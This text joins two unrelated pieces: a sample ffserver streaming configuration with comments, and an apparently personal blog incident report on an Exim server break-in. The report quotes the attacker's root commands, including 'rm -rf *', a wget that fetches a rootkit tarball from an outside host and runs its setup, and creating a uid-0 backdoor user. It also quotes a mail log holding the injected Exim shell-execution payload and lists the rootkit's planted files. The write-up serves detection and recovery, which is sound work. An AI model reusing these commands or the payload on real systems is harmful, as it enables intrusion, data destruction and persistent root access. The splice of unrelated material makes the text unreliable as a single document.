     # Port on which the server is listening. You must select a different
     # port from your standard HTTP web server if it is running on the same
     # computer.
     Port 8090
     # Address on which the server is bound. Only useful if you have
     # several network interfaces.
     BindAddress 0.0.0.0
     RTSPPort 554
     RTSPBindAddress 0.0.0.0
     # Number of simultaneous HTTP connections that can be handled. It has
     # to be defined *before* the MaxClients parameter, since it defines the
     # MaxClients maximum limit.
     MaxHTTPConnections 2000
     # Number of simultaneous requests that can be handled. Since FFServer
     # is very fast, it is more likely that you will want to leave this high
     # and use MaxBandwidth, below.
     MaxClients 1000
     # This the maximum amount of kbit/sec that you are prepared to
     # consume when streaming to clients.
     MaxBandwidth 1000
     # Access log file (uses standard Apache log file format)
     # '-' is the standard output.
     CustomLog -
     # Suppress that if you want to launch ffserver as a daemon.
     NoDaemon
  • Definition of the live feeds. Each live feed contains one video and/or audio sequence coming from an ffmpeg encoder or another ffserver. This sequence may be encoded simultaneously with several codecs at several resolutions. You must use ffmpeg to send a live feed to ffserver. In this example, you can type ffmpeg http://localhost:8090/feed1.ffm or ffmpeg -f alsa -i hw:1 -f video4linux2 -r 25 -s 352x288 -i /dev/video0 http://localhost:8090/feed1.ffm:
     ################################################################################
     <Feed feed1.ffm>
     # ffserver can do time shifting. It means that it can stream any
     # previously recorded live stream. The request should contain:
     # "http://xxxx?date=[YYYY-MM-DDT][[HH:]MM:]SS[.m...]".You must specify
     # a path where the feed is stored on disk. You also specify the
     # maximum size of the feed, where zero means unlimited. Default:
     # File=/tmp/feed_name.ffm FileMaxSize=5M
     File /tmp/feed1.ffm
     FileMaxSize 100M
     # You could specify
     # ReadOnlyFile /saved/specialvideo.ffm
     # This marks the file as readonly and it will not be deleted or updated.
     # Specify launch in order to start ffmpeg automatically.
     # First ffmpeg must be defined with an appropriate path if needed,
     # after that options can follow, but avoid adding the http:// field
     # Launch ffmpeg
     # Only allow connections from localhost to the feed.
     ACL allow 127.0.0.1
     </Feed>
  • Setting an RTSP/RTP stream:
     ################################################################################
     # The .sdp extension is very important to allow RTP to work well.
     #
     # Note that AVOptionVideo is only interesting for libx264 video codec:
     # For RTSP:
     # ffplay  rtsp://10.121.55.148:554/live.sdp
     #
     # For SDP (RTP):
     #   vlc  http://10.121.55.148:8090/live.sdp
     #
     <Stream live.sdp>
     Format rtp
     Feed feed1.ffm
     ### MulticastAddress 224.124.0.1
     ### MulticastPort 5000
     ### MulticastTTL 16
     # NoLoop
     VideoSize 352x288
     VideoFrameRate 15
     VideoBitRate 200
     # Alternative video codecs:
     # VideoCodec h263p
     # VideoCodec h263
     # VideoCodec libxvid
     # VideoQMin 10
     # VideoQMax 31
     VideoCodec libx264
     AVOptionVideo me_range 16
     AVOptionVideo i_qfactor .71
     AVOptionVideo qmin 30
     AVOptionVideo qmax 51
     AVOptionVideo qdiff 4
     # AVOptionVideo coder 0
     # AVOptionVideo flags +loop
     # AVOptionVideo cmp +chroma
     # AVOptionVideo partitions +parti8x8+parti4x4+partp8x8+partb8x8
     # AVOptionVideo me_method hex
     # AVOptionVideo subq 7
     # AVOptionVideo g 50
     # AVOptionVideo keyint_min 5
     # AVOptionVideo sc_threshold 0
     # AVOptionVideo b_strategy 1
     # AVOptionVideo qcomp 0.6
     # AVOptionVideo bf 3
     # AVOptionVideo refs 3
     # AVOptionVideo directpred 1
     # AVOptionVideo trellis 1
     # AVOptionVideo flags2 +mixed_refs+wpred+dct8x8+fastpskip
     # AVOptionVideo wpredp 2
     ## AVOptionVideo flags +global_header+loop
     # NoAudio
     AudioCodec libmp3lame
     AudioBitRate 32
     AudioChannels 1
     AudioSampleRate 24000
     ## AVOptionAudio flags +global_header
     </Stream>
  • Setting an FLV stream output:
     ################################################################################
     # FLV output - good for streaming
     <Stream test.flv>
     # the source feed
     Feed feed1.ffm
     # the output stream format - FLV = FLash Video
     Format flv
     VideoCodec flv
     # this must match the ffmpeg -r argument
     VideoFrameRate 15
     # generally leave this is a large number
     VideoBufferSize 80000
     # another quality tweak
     VideoBitRate 200
     # quality ranges - 1-31 (1 = best, 31 = worst)
     VideoQMin 1
     VideoQMax 5
     VideoSize 352x288
     # this sets how many seconds in past to start
     PreRoll 0
     # webcams don't have audio
     Noaudio
     </Stream>
  • Setting an ASF stream output:
     ################################################################################
     # ASF output - for windows media player
     <Stream test.asf>
     # the source feed
     Feed feed1.ffm
     # the output stream format - ASF
     Format asf
     VideoCodec msmpeg4
     # this must match the ffmpeg -r argument
     VideoFrameRate 15
     # transmit only intra frames (useful for low bitrates, but kills frame rate).
     # VideoIntraOnly
     # if non-intra only, an intra frame is transmitted every VideoGopSize
     # frames. Video synchronization can only begin at an intra frame.
     VideoGopSize 40
     # generally leave this is a large number
     VideoBufferSize 1000
     # another quality tweak
     VideoBitRate 200
     # quality ranges - 1-31 (1 = best, 31 = worst)
     VideoQMin 1
     VideoQMax 15
     VideoSize 352x288
     # this sets how many seconds in past to start
     PreRoll 0
     # generally, webcams don't have audio
     # Noaudio
     AudioCodec libmp3lame
     AudioBitRate 32
     AudioChannels 1
     AudioSampleRate 24000
     </Stream>
  • Other available streams:
     # Multipart JPEG
     #<Stream test.mjpg>
     #Feed feed1.ffm
     #Format mpjpeg
     #VideoFrameRate 2
     #VideoIntraOnly
     #NoAudio
     #Strict -1
     #</Stream>
     # Single JPEG
     #<Stream test.jpg>
     #Feed feed1.ffm
     #Format jpeg
     #VideoFrameRate 2
     #VideoIntraOnly
     ##VideoSize 352x240
     #NoAudio
     #Strict -1
     #</Stream>
     # Flash
     #<Stream test.swf>
     #Feed feed1.ffm
     #Format swf
     #VideoFrameRate 2
     #VideoIntraOnly
     #NoAudio
     #</Stream>
     # MP3 audio
     #<Stream test.mp3>
     #Feed feed1.ffm
     #Format mp2
     #AudioCodec mp3
     #AudioBitRate 64
     #AudioChannels 1
     #AudioSampleRate 44100
     #NoVideo
     #</Stream>
     # Ogg Vorbis audio
     #<Stream test.ogg>
     #Feed feed1.ffm
     #Title "Stream title"
     #AudioBitRate 64
     #AudioChannels 2
     #AudioSampleRate 44100
     #NoVideo
     #</Stream>
     # Real with audio only at 32 kbits
     #<Stream test.ra>
     #Feed feed1.ffm
     #Format rm
     #AudioBitRate 32
     #NoVideo
     #NoAudio
     #</Stream>
     # Real with audio and video at 64 kbits
     #<Stream test.rm>
     #Feed feed1.ffm
     #Format rm
     #AudioBitRate 32
     #VideoBitRate 128
     #VideoFrameRate 25
     #VideoGopSize 25
     #NoAudio
     #</Stream>
  • Other special streams:
     # Server status
     <Stream stat.html>
     Format status
     # Only allow local people to get the status
     ACL allow localhost
     ACL allow 192.168.0.0 192.168.255.255
     #FaviconURL http://pond1.gladstonefamily.net:8080/favicon.ico
     </Stream>
    
     # Redirect index.html to the appropriate site
     <Redirect index.html>
     URL http://www.ffmpeg.org/
     </Redirect>


My Exim is under attack!!

Exim logo

A few days ago, I received an alarm from a mailing list server under my management: the /etc/passwd file had been modified. In fact, my system had been broken into and somebody was modifying my server at will. Fortunately, I usually configure my monitoring system to check for md5 variations in the important files of the system. I quickly logged on to the host and saw the following commands had been executed as root on my server:

id
pwd
cd ..
cd ..
ls
rm -rf *
ls
wget \freewebtown.com/zaxback/rk.tar
tar xzvf rk.tar
cd shv5
./setup 54472Nx79904 9292
ls
pwd
ls
/usr/sbin/useradd -u 0 -g 0 -o mt
passwd mt

The hacker had installed something on my server and I had to discover what! …

The downloaded package, rk.tar (http://freewebtown.com/zaxback/rk.tar), contained a piece of badware: a trojan called shv5. It is mainly a backdoor plus a suite of fake system libraries and binaries, maliciously modified.

The first task on the TODO list was to check whether somebody else was still connected to the system and, at least, to review the auth.log to find the IP which was the origin of the attack.

Once I had detected the hacker’s IP and confirmed my suspicion about the origin of the attack (an infected Windows host, a zombie), I decided that following the hacker’s tracks was time lost, so I began to check the scope of the intrusion.

Reviewing the rk.tar package and the setup.sh script, I managed to make a list of the possibly infected files on my server:

/sbin/xlogin
/bin/login
/etc/sh.conf
/bin/.bash_history
/lib/lidps1.so
/usr/include/hosts.h
/usr/include/file.h
/usr/include/log.h
/usr/include/proc.h
/lib/libsh.so
/lib/libsh.so/*
/usr/lib/libsh
/usr/lib/libsh/*
/sbin/ttyload
/usr/sbin/ttyload
/sbin/ttymon
/etc/inittab
/usr/bin/ps
/bin/ps
/sbin/ifconfig
/usr/sbin/netstat
/bin/netstat
/usr/bin/top
/usr/bin/slocate
/bin/ls
/usr/bin/find
/usr/bin/dir
/usr/sbin/lsof
/usr/bin/pstree
/usr/bin/md5sum
/sbin/syslogd
/etc/ttyhash
/lib/ldd.so
/lib/ldd.so/*
/usr/src/.puta
/usr/src/.puta/*
/usr/sbin/xntpd
/usr/sbin/nscd
/usr/info/termcap.info-5.gz
/usr/include/audit.h
/usr/include/bex
/usr/include/bex/*
/var/log/tcp.log
/usr/bin/sshd2
/usr/bin/xsf
/usr/bin/xchk
/dev/tux
/usr/bin/ssh2d
/lib/security/.config/
/lib/security/.config/*
/etc/ld.so.hash
/etc/rc.d/rc.sysinit
/etc/inetd.conf

I noted that many important system commands had been replaced by unsafe ones. The reason was obvious: hide the trojan! Also, the badware had modified the attributes of the infected files to prevent modifications (chattr +isa /usr/sbin/netstat, for example).

Immediately, I decided to reinstall the main binaries and libraries of the system:

apt-get install --reinstall net-tools coreutils
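
After reinstalling, a checksum verification tool such as debsums can help to confirm that the on-disk files match the Debian packages again (a sanity check, not a full forensic guarantee):

apt-get install debsums
debsums -s net-tools coreutils   # -s: only report files with changed checksums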

After recovering safe versions of commands like netstat, md5sum, ls and similar, I began to see what was really happening on the system:

  • A keylogger was up on the system:
    root      7469  0.0  0.0   1804   652 ?        S    14:55   0:00 ttymon tymon
    
    tcp        0      0 0.0.0.0:9292            0.0.0.0:* LISTEN     7467/ttyload
  • A hidden HTTP/FTP server was running:
    103       7671  0.1  0.1   4936  2968 ?        S    14:58   0:18  syslogr
    root     10886  0.0  0.0  11252  1200 ?        Sl   17:39   0:00 /usr/sbin/httpd
    
    tcp        0      0 0.0.0.0:64842           0.0.0.0:* LISTEN     7424/httpd

The syslogr process had nothing to do with the syslog system. It was a process which launched the hidden HTTP/FTP service to share files … files from the infected server. In addition, the syslogr process was relaunched by a root cronjob to keep it running on the system:

# crontab  -l
* * * * * /.../bin/cron.sh >/dev/null 2>&1

More things! As you can observe in the cron job, somebody had created a hidden directory under the / directory: /... . This directory contained the httpd binaries and the config files and directories used by the httpd process.

After some time working on the server, I had taken the following actions in order to close all the security breaches detected:

  • I reinstalled all the binaries and libraries that might be unsafe after the attack.
  • I killed the bad processes on the system (aka syslogr, ttymon …) and removed the cronjobs and any other mechanisms keeping them up.
  • I deleted the user mt with uid=0.
  • I reviewed the SSH access to the server on the main firewall.

Six coffees later, I reached a more detailed diagnosis of what had happened … and there was no good news 😦

On December 16, the server had been hacked through a vulnerability discovered in the Exim4 service and reported in the Debian Security Reports on December 10:

http://www.debian.org/security/2010/dsa-2131

This vulnerability allowed remote execution of arbitrary code and privilege escalation, which allowed the attacker to inject public keys for the root user.

2010-12-16 20:47:25 1PTJj8-0006K2-Ck rejected from  H=trbearcom.com.au (yahoo.com) [131.103.65.196]: message too big: read=52518119 max=52428800
2010-12-16 20:48:25 H=trbearcom.com.au (yahoo.com) [131.103.65.196] temporarily rejected MAIL webmaster@yahoo.com: failed to expand ACL string "/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} [… the same ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} payload repeated hundreds of times …]
2010-12-16 20:49:06 1PTJp4-0006Kx-E5  sistemas-srv  R=mailman_router T=mailman_transport

The attack could have been controlled at this point, but I missed two things:

  1. The monitoring of the root authorized keys file could not see the changes because it didn’t have permission to access the file, so the monitor didn’t report anything.
  2. At some point, the SSH access restriction was removed.

These facts allowed the attack to continue hidden until January 9. I lost!!!

As a summary, the timing of the attack is as follows:

  • December 10, the Exim vulnerability is discovered and published:

    NM/09 Bugzilla 787: Potential buffer overflow in string_format Patch provided by Eugene Bujak

  • December 16, a large-scale attack is performed using this vulnerability, during which my host is broken into from trbearcom.com.au (yahoo.com) [131.103.65.196]. In this attack, the attacker’s public key for the root user is installed
  • December 26, the attacker inserts a trojan into my host
  • January 9, the attacker inserts a keylogger and attempts to hide it by editing system tools. During this attack, my monitors notify me that the /etc/passwd file has changed

Finally, I knew how the attacker had broken into my server and the things I had to fix, so I took the following actions in order to restore the security of my server:

  • Updated the system to lenny:
    1. Edit the /etc/apt/sources.list file, pointing the repositories to lenny
    2. sudo aptitude update
    3. sudo aptitude install apt dpkg aptitude
    4. sudo aptitude full-upgrade
